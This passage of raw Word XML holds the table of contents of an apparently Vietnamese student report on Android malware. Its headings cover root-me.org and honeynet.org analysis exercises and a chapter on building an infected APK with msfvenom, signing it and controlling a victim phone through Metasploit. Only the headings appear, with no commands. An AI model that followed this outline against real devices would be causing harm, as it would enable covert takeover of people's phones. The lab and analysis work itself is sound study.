            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6237D44E" w14:textId="2D3D98A2" w:rsidR="00C45784" w:rsidRDefault="00C45784">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10529"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533387042" w:history="1">
            <w:r w:rsidRPr="00952DE3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chương 2. Bài tập honeynet.org.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc533387042 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="12D8A422" w14:textId="0CECB95C" w:rsidR="00C45784" w:rsidRDefault="00C45784">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10529"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533387043" w:history="1">
            <w:r w:rsidRPr="00952DE3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>1.Cung cấp nhãn hiệu điện thoại, kiểu máy, tên hệ điều hành và phiên bản.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc533387043 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C1D6021" w14:textId="6243BCB9" w:rsidR="00C45784" w:rsidRDefault="00C45784">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10529"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533387044" w:history="1">
            <w:r w:rsidRPr="00952DE3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.Trích xuất bất kỳ ứng dụng đáng ngờ(nếu có).Chi tiết khai thác và phương pháp.Cung cấp tên SHA1 cho mỗi ứng dụng đáng ngờ.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc533387044 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2DFD992C" w14:textId="7DD718A3" w:rsidR="00C45784" w:rsidRDefault="00C45784">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10529"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533387045" w:history="1">
            <w:r w:rsidRPr="00952DE3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.Xác định quyền được yêu cầu của ứng dụng. Tại sao nó đáng nghi ngờ.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc533387045 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74E9F5E3" w14:textId="600F8D42" w:rsidR="00C45784" w:rsidRDefault="00C45784">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10529"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533387046" w:history="1">
            <w:r w:rsidRPr="00952DE3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.Cung cấp giải pháp nhanh chóng để phát hiện bất kỳ API đáng ngờ nào.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc533387046 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E8AFB8D" w14:textId="1C76CFA9" w:rsidR="00C45784" w:rsidRDefault="00C45784">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10529"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533387047" w:history="1">
            <w:r w:rsidRPr="00952DE3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5. Mô hình truyề</w:t>
            </w:r>
            <w:r w:rsidRPr="00952DE3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>n</w:t>
            </w:r>
            <w:r w:rsidRPr="00952DE3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> thông giữa phần mềm độc hại và máy chủ C&amp;C.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc533387047 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44E13440" w14:textId="72E04285" w:rsidR="00C45784" w:rsidRDefault="00C45784">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10529"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533387048" w:history="1">
            <w:r w:rsidRPr="00952DE3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chương 3. Tạo file lây nhiễm và điều khiển thiết bị Android.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc533387048 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E9E67E6" w14:textId="55A27A0D" w:rsidR="00C45784" w:rsidRDefault="00C45784">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10529"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533387049" w:history="1">
            <w:r w:rsidRPr="00952DE3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.Tạo file APK sử dụng msfvenom</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc533387049 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E04A490" w14:textId="5962B3E2" w:rsidR="00C45784" w:rsidRDefault="00C45784">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10529"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533387050" w:history="1">
            <w:r w:rsidRPr="00952DE3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.Sử dụng key tool để tạo khóa cho file</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc533387050 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="432A297D" w14:textId="32C586EA" w:rsidR="00C45784" w:rsidRDefault="00C45784">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10529"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533387051" w:history="1">
            <w:r w:rsidRPr="00952DE3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.Tạo key store để sử dụng jarsigner</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc533387051 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43867FF2" w14:textId="3371220F" w:rsidR="00C45784" w:rsidRDefault="00C45784">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10529"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533387052" w:history="1">
            <w:r w:rsidRPr="00952DE3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4. Ký gói apk bằng jarsigner.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc533387052 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="19E73119" w14:textId="46366442" w:rsidR="00C45784" w:rsidRDefault="00C45784">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10529"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533387053" w:history="1">
            <w:r w:rsidRPr="00952DE3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5. Tiến hành cài và sử dụng Metasploit để điều khiển máy nạn nhân</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc533387053 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="555338D0" w14:textId="041E1DF3" w:rsidR="00C45784" w:rsidRDefault="00C45784">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10529"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533387054" w:history="1">
            <w:r w:rsidRPr="00952DE3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6. Kết quả.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc533387054 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74B76E42" w14:textId="76B7264A" w:rsidR="00C45784" w:rsidRDefault="00C45784">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10529"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc533387055" w:history="1">
            <w:r w:rsidRPr="00952DE3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chương 4. Điều tra file vừa tạo.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc533387055 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52D175D8" w14:textId="5D95B677" w:rsidR="00C576A8" w:rsidRPr="00447E87" w:rsidRDefault="002F62FD" w:rsidP="00043F4A">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00447E87">
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:b/>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="2783A3BA" w14:textId="77777777" w:rsidR="00EE1D6A" w:rsidRPr="00447E87" w:rsidRDefault="00EE1D6A" w:rsidP="00EE1D6A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D4D3613" w14:textId="7AFB46C8" w:rsidR="00C576A8" w:rsidRPr="00447E87" w:rsidRDefault="0048578D" w:rsidP="00EE1D6A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc531729510"/>
      <w:bookmarkStart w:id="1" w:name="_Toc533387039"/>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Chương 1</w:t>
      </w:r>
      <w:r w:rsidR="002F62FD" w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00447E87">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Bài tập trên trang root-me.org</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="41549129" w14:textId="14D75B19" w:rsidR="00FA7394" w:rsidRPr="00447E87" w:rsidRDefault="00FA7394" w:rsidP="00FA7394">
